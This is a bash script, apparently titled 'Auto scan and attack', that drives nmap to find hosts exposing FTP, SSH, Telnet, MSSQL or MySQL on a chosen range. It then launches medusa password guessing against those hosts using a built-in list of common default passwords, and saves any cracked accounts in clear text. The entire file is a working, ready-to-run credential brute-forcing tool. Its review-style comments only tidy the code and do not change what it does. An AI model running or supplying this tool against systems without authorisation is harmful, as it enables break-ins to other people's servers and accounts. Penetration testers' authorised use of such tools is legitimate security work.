#!/bin/bash
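# autonmap.sh: interactive wrapper that runs an nmap service scan against
# Rhost on one chosen port, then a medusa password-guessing pass against the
# hosts that answered on that port.
# Scan output and any recovered credentials are written in clear text under
# ./tmp of the current directory.
#Author: Qingzheng
#platform: backtrack5 r3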
# Print the banner followed by an example of the two prompts.
# Globals:  red, white (read) - colour escape sequences set by the caller
# Outputs:  banner and example text on stdout
function Usage(){
  local border="########################################"

  printf '%s\n' \
    "$border" \
    "#Auto scan and attack #" \
    "#autonmap.sh #" \
    "#Author: Qingzheng #" \
    "$border"

  # %b expands the backslash escapes held in the colour variables.
  printf '%b\n' \
    "${red}Example:" \
    "Rhost:>> 192.168.0.0/24" \
    "Rport:>> 21 (21/22/23/1433/3306)$white"

  printf '\n'
}
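# Create ./tmp and seed the default user and password lists read by the
# medusa step.
# Globals:  none
# Outputs:  writes tmp/user.dict and tmp/passwd.dict under the current
#           directory when they do not exist yet; existing files are kept
# Returns:  0 on success, 1 if the working directory cannot be set up
function DictCreate(){
  local workdir
  workdir="$(pwd)/tmp" || return 1

  if [[ ! -d "$workdir" ]]; then
    # 0700: ScanAttack later writes scan results and found accounts here.
    if ! mkdir -m 700 -- "$workdir"; then
      printf 'Cannot create %s\n' "$workdir" >&2
      return 1
    fi
  fi

  # Seed each list independently of whether tmp already existed, so a
  # pre-existing empty tmp directory no longer leaves the lists missing.
  if [[ ! -e "$workdir/user.dict" ]]; then
    printf 'root\n' >"$workdir/user.dict"
  fi

  if [[ ! -e "$workdir/passwd.dict" ]]; then
    printf '%s\n' \
      admin administrator administrators root mysql admin123 admini123 \
      toor toor123 mysql mysql123 123456 12345678 \
      >"$workdir/passwd.dict"
  fi
}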
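# Make sure nmap and medusa are available, installing any missing one with
# apt-get.
# Globals:  blue, white (read) - colour escape sequences
# Outputs:  progress message and prefixed apt-get output on stdout,
#           failure notice on stderr
# Returns:  0 if both tools are present or installed, 1 if an install failed
function Checknmapmedusa(){
  local tool
  local rc=0

  for tool in nmap medusa; do
    # command -v searches PATH, so a copy outside /usr/local/bin is found
    # instead of triggering a reinstall on every run.
    if command -v "$tool" >/dev/null 2>&1; then
      continue
    fi

    echo -e "[$blue>$white] Start install $tool"
    # NOTE(review): this installs unattended (-y) from whatever apt sources
    # the host has configured, and needs root.
    apt-get install -y "$tool" | sed "s/^/[$tool]/g"
    # The pipeline status is sed's; check apt-get's own exit code.
    if (( PIPESTATUS[0] != 0 )); then
      printf '[%s] install failed\n' "$tool" >&2
      rc=1
    fi
  done

  return "$rc"
}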
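# Run the nmap scan for one port, collect the hosts reported open with the
# expected service, and hand that list to medusa.
# Globals:  Rhost   (read) - target specification typed at the prompt
#           Rport   (read) - TCP port number
#           Rserver (read) - service / medusa module name chosen by Main
#           blue, white (read) - colour escape sequences
# Outputs:  progress messages on stdout; tmp/scan-analyze-<port> (host list)
#           and tmp/output-<port>.lst (found accounts, clear text)
# Returns:  0 normally, 1 when Rhost or Rport is rejected
function ScanAttack(){
  local workdir scan_file hosts_file result_file token
  local -a targets=()
  # A target must start with an alphanumeric so it can never be taken for an
  # nmap option, and may only hold host/CIDR/range characters.
  local -r target_re='^[A-Za-z0-9][A-Za-z0-9._:/,-]*$'

  workdir="$(pwd)/tmp" || return 1

  # Rport ends up in file names and in the grep pattern below.
  if [[ ! "$Rport" =~ ^[0-9]+$ ]]; then
    printf 'Invalid Rport: %s\n' "$Rport" >&2
    return 1
  fi

  # Split on whitespace only; no globbing or shell evaluation happens here.
  read -r -a targets <<<"$Rhost"
  if (( ${#targets[@]} == 0 )); then
    printf 'Rhost is empty\n' >&2
    return 1
  fi
  for token in "${targets[@]}"; do
    if [[ ! "$token" =~ $target_re ]]; then
      printf 'Invalid Rhost entry: %s\n' "$token" >&2
      return 1
    fi
  done

  scan_file="$workdir/scan-$Rport"
  hosts_file="$workdir/scan-analyze-$Rport"
  result_file="$workdir/output-$Rport"

  echo -e "[$blue>$white] Starting scan..."
  # Arguments are passed to xterm -e as separate words (the form the medusa
  # call already uses), so nothing typed at the prompt is re-parsed by a shell.
  xterm -geometry 80x20+80+0 -e nmap -v -sS -sV -oG "$scan_file" \
    -p "$Rport" "${targets[@]}"

  if [[ -f "$scan_file" ]]; then
    # Field 2 of a greppable-output host line is the address.
    grep -- "$Rport/open/tcp//$Rserver//" "$scan_file" \
      | cut -d' ' -f2 >"$hosts_file"
    rm -f -- "$scan_file"
  else
    # No scan output (xterm or nmap did not run): leave an empty host list.
    : >"$hosts_file"
  fi
  sed "s/^/ > /g" "$hosts_file"

  if [[ -s "$hosts_file" ]]; then
    echo -e "[$blue>$white] Straring try crack..."
    xterm -geometry 80x20+80+640 -e medusa \
      -U "$workdir/user.dict" -P "$workdir/passwd.dict" -e ns -v 10 \
      -H "$hosts_file" -M "$Rserver" -O "$result_file"

    if [[ -s "$result_file" ]]; then
      # Found accounts are appended in clear text to the .lst file; the raw
      # medusa log is removed afterwards.
      grep -- "ACCOUNT FOUND: " "$result_file" \
        | awk '{print $3,$4,$5,$6,$7,$8,$9}' \
        | sed "s/$Rserver/>/g" \
        | uniq \
        | tee -a "$result_file.lst" \
        && rm -f -- "$result_file"
      echo -e "[$blue>$white] Medusa DONE!!"
    else
      echo -e "[$blue-$white] Not founding passwd!!"
    fi
  else
    echo -e "[$blue>$white] Not founding hosts"
  fi

  return 0
}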
#####################################################################
#####################################################################
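# Interactive driver: print the banner, prepare ./tmp and the tools, then
# prompt for a target and port until an unsupported port is entered.
# Globals:  blue, red, white, underline (written) - colour escapes read by
#           the other functions
#           Rhost, Rport, Rserver (written) - consumed by ScanAttack
# Outputs:  prompts and status messages on stdout
function Main(){
  blue="\e[01;34m"
  red="\e[01;31m"
  white="\e[00m"
  underline="\\033[4m"

  Usage
  DictCreate
  Checknmapmedusa

  while true; do
    echo -en "${underline}Rhost$white:$blue>>$white"
    # -r keeps backslashes in the typed value literal.
    read -r Rhost
    echo -en "${underline}Rport$white:$blue>>$white"
    read -r Rport

    # Only these ports are accepted; each maps to the service name used for
    # the scan filter and the medusa module. Anything else (including an
    # empty answer at end of input) ends the loop.
    case "$Rport" in
      21)   Rserver=ftp ;;
      22)   Rserver=ssh ;;
      23)   Rserver=telnet ;;
      1433) Rserver=mssql ;;
      3306) Rserver=mysql ;;
      *)
        echo -e "[$blue>$white] Input error! Quit!!"
        break
        ;;
    esac

    ScanAttack
  done
}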
#########################################################
#########################################################
# Entry point: start the interactive prompt loop.
Main